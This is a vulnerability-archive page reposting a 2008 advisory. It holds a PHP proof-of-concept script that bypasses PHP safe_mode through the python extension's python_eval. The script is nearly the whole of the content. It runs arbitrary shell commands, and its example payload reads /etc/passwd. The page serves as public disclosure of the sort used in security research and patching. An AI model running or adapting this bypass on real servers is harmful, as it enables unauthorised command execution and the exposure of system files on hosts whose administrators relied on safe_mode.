Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  PHP python module safe_mode bypass

From:amir_(at)_salmani.ir <amir_(at)_salmani.ir>
Date:21.12.2008
Subject:php python extension safe_mode bypass

<?php
/*
 php_python_bypass.php
 php python extension safe_mode bypass
 Amir Salmani - amir[at]salmani[dot]ir
*/

//python ext. installed?
if (!extension_loaded('python')) die("python extension is not installed\n");

//eval python code
$res = python_eval('
import os
pwd = os.getcwd()
print pwd
os.system('cat /etc/passwd')
');

//show result
echo $res;
?>

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru